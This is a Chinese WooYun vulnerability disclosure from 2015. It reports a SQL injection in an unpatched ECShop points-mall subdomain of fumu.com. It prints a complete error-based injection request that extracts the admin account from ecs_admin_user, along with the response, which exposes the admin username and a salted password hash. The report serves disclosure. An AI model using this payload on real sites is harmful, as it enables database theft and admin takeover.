漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0106767
漏洞标题:父母网某分站SQl注入
相关厂商:父母网
漏洞作者: ModNar
提交时间:2015-04-10 10:17
修复时间:2015-04-15 10:18
公开时间:2015-04-15 10:18
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:15
漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-04-10: 细节已通知厂商并且等待厂商处理中
2015-04-15: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
补丁不及时导致的SQL注入
详细说明:
用的是ecshop,补丁不及时导致的SQL注入
请求:
POST http://jifen.fumu.com/flow.php?step=update_cart HTTP/1.1
Host: jifen.fumu.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 337
goods_number%5B1%27 and %28select 1 from%28select count%28*%29%2Cconcat%28%28select %28select %28SELECT concat%28user_name%2C0x7c%2Cpassword%29 FROM ecs_admin_user limit 0%2C1%29%29 from information_schema.tables limit 0%2C1%29%2Cfloor%28rand%280%29*2%29%29x from information_schema.tables group by x%29a%29 and 1%3D1 %23%5D=1&submit=exp
响应:
MySQL server error report:Array ( [0] => Array ( [message] => MySQL Query Error ) [1] => Array ( [sql] => SELECT `goods_id`, `goods_attr_id`, `product_id`, `extension_code`, use_integral FROM`fumu_jifen`.`ecs_cart` WHERE rec_id='1' and (select 1 from(select count(*),concat((select (select (SELECT concat(user_name,0x7c,password) FROM ecs_admin_user limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 #' AND session_id='95238a2aebc1ff5d1a38e2f44cbe442c' ) [2] => Array ( [error] => Duplicate entry 'admin|c49803e7dffa2410f86139c9115225d31' for key 'group_key' ) [3] => Array ( [errno] => 1062 ) )
admin|c49803e7dffa2410f86139c9115225d31
可见爆出了用户名和salt后的密码
未继续深入
漏洞证明:
请求:
POST http://jifen.fumu.com/flow.php?step=update_cart HTTP/1.1
Host: jifen.fumu.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 337
goods_number%5B1%27 and %28select 1 from%28select count%28*%29%2Cconcat%28%28select %28select %28SELECT concat%28user_name%2C0x7c%2Cpassword%29 FROM ecs_admin_user limit 0%2C1%29%29 from information_schema.tables limit 0%2C1%29%2Cfloor%28rand%280%29*2%29%29x from information_schema.tables group by x%29a%29 and 1%3D1 %23%5D=1&submit=exp
响应:
MySQL server error report:Array ( [0] => Array ( [message] => MySQL Query Error ) [1] => Array ( [sql] => SELECT `goods_id`, `goods_attr_id`, `product_id`, `extension_code`, use_integral FROM`fumu_jifen`.`ecs_cart` WHERE rec_id='1' and (select 1 from(select count(*),concat((select (select (SELECT concat(user_name,0x7c,password) FROM ecs_admin_user limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 #' AND session_id='95238a2aebc1ff5d1a38e2f44cbe442c' ) [2] => Array ( [error] => Duplicate entry 'admin|c49803e7dffa2410f86139c9115225d31' for key 'group_key' ) [3] => Array ( [errno] => 1062 ) )
admin|c49803e7dffa2410f86139c9115225d31
可见爆出了用户名和salt后的密码
修复方案:
打官方最新补丁或根据参数改代码
版权声明:转载请注明来源 ModNar@乌云
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2015-04-15 10:18
厂商回复:
漏洞Rank:4 (WooYun评价)
最新状态:
暂无